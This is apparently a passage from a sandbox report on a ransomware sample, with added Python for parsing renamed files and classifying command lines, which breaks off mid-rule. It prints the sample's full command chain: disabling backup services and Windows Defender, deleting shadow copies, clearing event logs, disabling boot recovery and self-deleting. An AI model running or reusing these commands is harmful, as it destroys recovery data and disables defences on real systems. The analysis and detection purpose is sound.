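The renamed paths in the table above all follow one shape: the original file name, a long base64url-style token, and the extension `.p5rwm` (a few files, the Windows Sidebar gadget assets for instance, are opened for modification but not renamed). The report does not explain what the token encodes, so the parser below treats it as opaque: it recovers the original file names and groups the renamed files by token, which makes the two token variants visible (they differ only in their tail). This is an added example and not part of the sandbox report; the sample paths are copied from the table, and the 40-character minimum token length is an assumption chosen to avoid matching ordinary multi-dot file names.

```python
import re

# Constructed sample: a handful of paths from the "File opened for modification"
# table above, plus one file the sample opened but did not rename.
SAMPLE_PATHS = [
    r"C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_IAAAACAAAAA0.p5rwm",
    r"C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm",
    r"C:\Program Files\Java\jre7\lib\zi\America\Dawson.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm",
    r"C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html",
    r"C:\Program Files (x86)\Microsoft Office\Office14\msaccess.exe.manifest.rCvJDOCaKEVVb7sy4UXq7BUAOYbjVQYuOA0NOG1SJE7_AAAAAAAAAAA0.p5rwm",
]

ENCRYPTED_EXT = "p5rwm"  # extension observed in the report

# <original name>.<token>.<ext>; the token is base64url-like. The 40-char
# minimum is an assumption so that ordinary "name.ext" files never match.
ENCRYPTED_RE = re.compile(
    r"^(?P<original>.+)\.(?P<token>[A-Za-z0-9_-]{40,})\." + re.escape(ENCRYPTED_EXT) + r"$"
)


def parse_encrypted_name(path):
    """Return (original_path, token) for a renamed file, or None if the name
    does not follow the pattern. Works on the file-name component only, so
    dots in directory names (e.g. Microsoft.NET) do not confuse the match."""
    directory, sep, name = path.rpartition("\\")
    m = ENCRYPTED_RE.match(name)
    if not m:
        return None
    original = directory + sep + m.group("original")
    return original, m.group("token")


def summarize(paths):
    """Group renamed files by token (token kept opaque) and list the paths
    that were touched but not renamed."""
    by_token = {}
    untouched = []
    for p in paths:
        parsed = parse_encrypted_name(p)
        if parsed is None:
            untouched.append(p)
            continue
        original, token = parsed
        by_token.setdefault(token, []).append(original)
    return by_token, untouched


if __name__ == "__main__":
    groups, untouched = summarize(SAMPLE_PATHS)
    for token, originals in groups.items():
        print(f"token ...{token[-14:]}: {len(originals)} file(s)")
        for o in originals:
            print("   ", o)
    print("not renamed:", len(untouched))
```

Run against a full file listing from the host, the token grouping is the first thing to check: if every renamed file carries one of a small number of tokens, the per-file suffix is not a per-file key and an inventory by original name is straightforward.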

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1348 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1348 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1348 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1348 wrote to memory of 580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1160 wrote to memory of 1568 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1160 wrote to memory of 1568 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1160 wrote to memory of 1568 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 560 wrote to memory of 824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1988 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1988 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1988 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1712 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1712 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1712 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 2028 wrote to memory of 1692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 1692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2028 wrote to memory of 1692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 1008 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe
PID 1748 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe

"C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\wbzc_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1
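
The process list above is the whole pre-encryption routine in the order the sample ran it: stop and disable backup-related services with net.exe and sc.exe, switch Defender off through policy keys, service Start values, scheduled tasks, MpCmdRun and Set-MpPreference, delete shadow copies twice (vssadmin and wmic), clear the three main event logs, disable Windows recovery with bcdedit, open the ransom note, and finally delete the original binary behind a ping delay. Each command on its own is a legitimate administrative action; what makes the chain unambiguous is the combination. The classifier below, an added example that is not part of the sandbox report, runs a small rule set over process command lines of the kind an EDR or Sysmon Event ID 1 feed would carry and reports which stages of that chain are present. The sample command lines are copied from the list above; the ATT&CK technique IDs are a mapping added here, not taken from the report.

```python
import re

# Constructed sample telemetry: command lines taken from the Processes list
# above (one representative per stage), plus one benign ping for contrast.
SAMPLE_CMDLINES = [
    'net.exe stop "VSS" /y',
    'sc.exe config "VSS" start= disabled',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable',
    'vssadmin.exe delete shadows /all /quiet',
    'wmic.exe shadowcopy delete',
    'wevtutil.exe cl security',
    'bcdedit.exe /set {default} recoveryenabled no',
    'bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures',
    'cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\\Users\\Admin\\AppData\\Local\\Temp\\3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe"',
    'notepad.exe C:\\wbzc_HOW_TO_DECRYPT.txt',
    'ping.exe -n 5 127.0.0.1',  # benign on its own
]

# (label, ATT&CK technique, pattern). Technique IDs are this example's mapping.
RULES = [
    ("service stopped",              "T1489",     r"^net1?(\.exe)?\s+stop\b"),
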